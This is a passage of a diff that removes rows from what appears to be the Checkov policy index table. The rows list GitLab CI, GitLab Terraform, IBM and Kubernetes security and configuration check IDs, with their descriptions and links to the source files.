-| 2406 | CKV_GITLABCI_2           | jobs                             | *.rules                                                                                          | Avoid creating rules that generate double pipelines                                                                                                                                                      | gitlab_ci               | [AvoidDoublePipelines.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py)                                                                                        |
-| 2407 | CKV_GITLABCI_3           | jobs                             | *.image[]                                                                                        | Detecting image usages in gitlab workflows                                                                                                                                                               | gitlab_ci               | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py)                                                                                              |
-| 2408 | CKV_GITLABCI_3           | jobs                             | *.services[]                                                                                     | Detecting image usages in gitlab workflows                                                                                                                                                               | gitlab_ci               | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py)                                                                                              |
-| 2409 | CKV_GLB_1                | resource                         | gitlab_project                                                                                   | Ensure at least two approving reviews are required to merge a GitLab MR                                                                                                                                  | Terraform               | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py)                                                                |
-| 2410 | CKV_GLB_2                | resource                         | gitlab_branch_protection                                                                         | Ensure GitLab branch protection rules does not allow force pushes                                                                                                                                        | Terraform               | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py)                                                                                  |
-| 2411 | CKV_GLB_3                | resource                         | gitlab_project                                                                                   | Ensure GitLab prevent secrets is enabled                                                                                                                                                                 | Terraform               | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py)                                                                          |
-| 2412 | CKV_GLB_4                | resource                         | gitlab_project                                                                                   | Ensure GitLab commits are signed                                                                                                                                                                         | Terraform               | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py)                                                                          |
-| 2413 | CKV2_IBM_1               | resource                         | ibm_is_lb                                                                                        | Ensure load balancer for VPC is private (disable public access)                                                                                                                                          | Terraform               | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml)                                                 |
-| 2414 | CKV2_IBM_2               | resource                         | ibm_is_vpc                                                                                       | Ensure VPC classic access is disabled                                                                                                                                                                    | Terraform               | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml)                                                   |
-| 2415 | CKV2_IBM_3               | resource                         | ibm_iam_account_settings                                                                         | Ensure API key creation is restricted in account settings                                                                                                                                                | Terraform               | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml)                         |
-| 2416 | CKV2_IBM_4               | resource                         | ibm_iam_account_settings                                                                         | Ensure Multi-Factor Authentication (MFA) is enabled at the account level                                                                                                                                 | Terraform               | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml)                                                         |
-| 2417 | CKV2_IBM_5               | resource                         | ibm_iam_account_settings                                                                         | Ensure Service ID creation is restricted in account settings                                                                                                                                             | Terraform               | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml)                   |
-| 2418 | CKV2_IBM_6               | resource                         | ibm_database                                                                                     | Ensure Databases network access is restricted to a specific IP range                                                                                                                                     | Terraform               | [IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml)               |
-| 2419 | CKV2_IBM_7               | resource                         | ibm_container_cluster                                                                            | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint                                                                                                              | Terraform               | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml)                               |
-| 2420 | CKV_K8S_1                | resource                         | PodSecurityPolicy                                                                                | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Kubernetes              | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py)                                                                                        |
-| 2421 | CKV_K8S_1                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform               | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py)                                                                                  |
-| 2422 | CKV_K8S_2                | resource                         | PodSecurityPolicy                                                                                | Do not admit privileged containers                                                                                                                                                                       | Kubernetes              | [PrivilegedContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py)                                                                        |
-| 2423 | CKV_K8S_2                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit privileged containers                                                                                                                                                                       | Terraform               | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py)                                                                    |
-| 2424 | CKV_K8S_3                | resource                         | PodSecurityPolicy                                                                                | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Kubernetes              | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPCPSP.py)                                                                                        |
-| 2425 | CKV_K8S_3                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform               | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py)                                                                                  |
-| 2426 | CKV_K8S_4                | resource                         | PodSecurityPolicy                                                                                | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Kubernetes              | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py)                                                            |
-| 2427 | CKV_K8S_4                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform               | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py)                                                      |
-| 2428 | CKV_K8S_5                | resource                         | PodSecurityPolicy                                                                                | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Kubernetes              | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py)                                                                |
-| 2429 | CKV_K8S_5                | resource                         | kubernetes_pod_security_policy                                                                   | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform               | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py)                                                          |
-| 2430 | CKV_K8S_6                | resource                         | PodSecurityPolicy                                                                                | Do not admit root containers                                                                                                                                                                             | Kubernetes              | [RootContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersPSP.py)                                                                                    |
-| 2431 | CKV_K8S_6                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit root containers                                                                                                                                                                             | Terraform               | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py)                                                                                |
-| 2432 | CKV_K8S_7                | resource                         | PodSecurityPolicy                                                                                | Do not admit containers with the NET_RAW capability                                                                                                                                                      | Kubernetes              | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilitiesPSP.py)                                                                                |
-| 2433 | CKV_K8S_7                | resource                         | kubernetes_pod_security_policy                                                                   | Do not admit containers with the NET_RAW capability                                                                                                                                                      | Terraform               | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py)                                                                          |
-| 2434 | CKV_K8S_8                | resource                         | DaemonSet                                                                                        | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                            |
-| 2435 | CKV_K8S_8                | resource                         | Deployment                                                                                       | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                            |
-| 2436 | CKV_K8S_8                | resource                         | DeploymentConfig                                                                                 | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                            |
-| 2437 | CKV_K8S_8                | resource                         | Pod                                                                                              | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                            |
-| 2438 | CKV_K8S_8                | resource                         | PodTemplate                                                                                      | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                            |
-| 2439 | CKV_K8S_8                | resource                         | ReplicaSet                                                                                       | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                            |
-| 2440 | CKV_K8S_8                | resource                         | ReplicationController                                                                            | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                            |
-| 2441 | CKV_K8S_8                | resource                         | StatefulSet                                                                                      | Liveness Probe Should be Configured                                                                                                                                                                      | Kubernetes              | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py)                                                                                            |
-| 2442 | CKV_K8S_8                | resource                         | kubernetes_deployment                                                                            | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform               | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                      |
-| 2443 | CKV_K8S_8                | resource                         | kubernetes_deployment_v1                                                                         | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform               | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                      |
-| 2444 | CKV_K8S_8                | resource                         | kubernetes_pod                                                                                   | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform               | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                      |
-| 2445 | CKV_K8S_8                | resource                         | kubernetes_pod_v1                                                                                | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform               | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                      |
-| 2446 | CKV_K8S_9                | resource                         | DaemonSet                                                                                        | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                          |
-| 2447 | CKV_K8S_9                | resource                         | Deployment                                                                                       | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                          |
-| 2448 | CKV_K8S_9                | resource                         | DeploymentConfig                                                                                 | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                          |
-| 2449 | CKV_K8S_9                | resource                         | Pod                                                                                              | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                          |
-| 2450 | CKV_K8S_9                | resource                         | PodTemplate                                                                                      | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                          |
-| 2451 | CKV_K8S_9                | resource                         | ReplicaSet                                                                                       | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                          |
-| 2452 | CKV_K8S_9                | resource                         | ReplicationController                                                                            | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                          |
-| 2453 | CKV_K8S_9                | resource                         | StatefulSet                                                                                      | Readiness Probe Should be Configured                                                                                                                                                                     | Kubernetes              | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py)                                                                                          |
-| 2454 | CKV_K8S_9                | resource                         | kubernetes_deployment                                                                            | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform               | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                    |
-| 2455 | CKV_K8S_9                | resource                         | kubernetes_deployment_v1                                                                         | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform               | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                    |
-| 2456 | CKV_K8S_9                | resource                         | kubernetes_pod                                                                                   | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform               | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                    |
-| 2457 | CKV_K8S_9                | resource                         | kubernetes_pod_v1                                                                                | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform               | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                    |
-| 2458 | CKV_K8S_10               | resource                         | CronJob                                                                                          | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                |
-| 2459 | CKV_K8S_10               | resource                         | DaemonSet                                                                                        | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                |
-| 2460 | CKV_K8S_10               | resource                         | Deployment                                                                                       | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                |
-| 2461 | CKV_K8S_10               | resource                         | DeploymentConfig                                                                                 | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                |
-| 2462 | CKV_K8S_10               | resource                         | Job                                                                                              | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                |
-| 2463 | CKV_K8S_10               | resource                         | Pod                                                                                              | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                |
-| 2464 | CKV_K8S_10               | resource                         | PodTemplate                                                                                      | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                |
-| 2465 | CKV_K8S_10               | resource                         | ReplicaSet                                                                                       | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                |
-| 2466 | CKV_K8S_10               | resource                         | ReplicationController                                                                            | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                |
-| 2467 | CKV_K8S_10               | resource                         | StatefulSet                                                                                      | CPU requests should be set                                                                                                                                                                               | Kubernetes              | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py)                                                                                                |
-| 2468 | CKV_K8S_10               | resource                         | kubernetes_deployment                                                                            | CPU requests should be set                                                                                                                                                                               | Terraform               | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                          |
-| 2469 | CKV_K8S_10               | resource                         | kubernetes_deployment_v1                                                                         | CPU requests should be set                                                                                                                                                                               | Terraform               | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                          |
-| 2470 | CKV_K8S_10               | resource                         | kubernetes_pod                                                                                   | CPU requests should be set                                                                                                                                                                               | Terraform               | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                          |
-| 2471 | CKV_K8S_10               | resource                         | kubernetes_pod_v1                                                                                | CPU requests should be set                                                                                                                                                                               | Terraform               | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                          |
-| 2472 | CKV_K8S_11               | resource                         | CronJob                                                                                          | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                    |
-| 2473 | CKV_K8S_11               | resource                         | DaemonSet                                                                                        | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                    |
-| 2474 | CKV_K8S_11               | resource                         | Deployment                                                                                       | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                    |
-| 2475 | CKV_K8S_11               | resource                         | DeploymentConfig                                                                                 | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                    |
-| 2476 | CKV_K8S_11               | resource                         | Job                                                                                              | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                    |
-| 2477 | CKV_K8S_11               | resource                         | Pod                                                                                              | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                    |
-| 2478 | CKV_K8S_11               | resource                         | PodTemplate                                                                                      | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                    |
-| 2479 | CKV_K8S_11               | resource                         | ReplicaSet                                                                                       | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                    |
-| 2480 | CKV_K8S_11               | resource                         | ReplicationController                                                                            | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                    |
-| 2481 | CKV_K8S_11               | resource                         | StatefulSet                                                                                      | CPU limits should be set                                                                                                                                                                                 | Kubernetes              | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py)                                                                                                    |
-| 2482 | CKV_K8S_11               | resource                         | kubernetes_deployment                                                                            | CPU Limits should be set                                                                                                                                                                                 | Terraform               | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                              |
-| 2483 | CKV_K8S_11               | resource                         | kubernetes_deployment_v1                                                                         | CPU Limits should be set                                                                                                                                                                                 | Terraform               | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                              |
-| 2484 | CKV_K8S_11               | resource                         | kubernetes_pod                                                                                   | CPU Limits should be set                                                                                                                                                                                 | Terraform               | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                              |
-| 2485 | CKV_K8S_11               | resource                         | kubernetes_pod_v1                                                                                | CPU Limits should be set                                                                                                                                                                                 | Terraform               | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                              |
-| 2486 | CKV_K8S_12               | resource                         | CronJob                                                                                          | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                          |
-| 2487 | CKV_K8S_12               | resource                         | DaemonSet                                                                                        | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                          |
-| 2488 | CKV_K8S_12               | resource                         | Deployment                                                                                       | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                          |
-| 2489 | CKV_K8S_12               | resource                         | DeploymentConfig                                                                                 | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                          |
-| 2490 | CKV_K8S_12               | resource                         | Job                                                                                              | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                          |
-| 2491 | CKV_K8S_12               | resource                         | Pod                                                                                              | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                          |
-| 2492 | CKV_K8S_12               | resource                         | PodTemplate                                                                                      | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                          |
-| 2493 | CKV_K8S_12               | resource                         | ReplicaSet                                                                                       | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                          |
-| 2494 | CKV_K8S_12               | resource                         | ReplicationController                                                                            | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                          |
-| 2495 | CKV_K8S_12               | resource                         | StatefulSet                                                                                      | Memory requests should be set                                                                                                                                                                            | Kubernetes              | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py)                                                                                          |
-| 2496 | CKV_K8S_12               | resource                         | kubernetes_deployment                                                                            | Memory Limits should be set                                                                                                                                                                              | Terraform               | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                        |
-| 2497 | CKV_K8S_12               | resource                         | kubernetes_deployment_v1                                                                         | Memory Limits should be set                                                                                                                                                                              | Terraform               | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                        |
-| 2498 | CKV_K8S_12               | resource                         | kubernetes_pod                                                                                   | Memory Limits should be set                                                                                                                                                                              | Terraform               | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                        |
-| 2499 | CKV_K8S_12               | resource                         | kubernetes_pod_v1                                                                                | Memory Limits should be set                                                                                                                                                                              | Terraform               | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                        |
-| 2500 | CKV_K8S_13               | resource                         | CronJob                                                                                          | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                              |
-| 2501 | CKV_K8S_13               | resource                         | DaemonSet                                                                                        | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                              |
-| 2502 | CKV_K8S_13               | resource                         | Deployment                                                                                       | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                              |
-| 2503 | CKV_K8S_13               | resource                         | DeploymentConfig                                                                                 | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                              |
-| 2504 | CKV_K8S_13               | resource                         | Job                                                                                              | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                              |
-| 2505 | CKV_K8S_13               | resource                         | Pod                                                                                              | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                              |
-| 2506 | CKV_K8S_13               | resource                         | PodTemplate                                                                                      | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                              |
-| 2507 | CKV_K8S_13               | resource                         | ReplicaSet                                                                                       | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                              |
-| 2508 | CKV_K8S_13               | resource                         | ReplicationController                                                                            | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                              |
-| 2509 | CKV_K8S_13               | resource                         | StatefulSet                                                                                      | Memory limits should be set                                                                                                                                                                              | Kubernetes              | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py)                                                                                              |
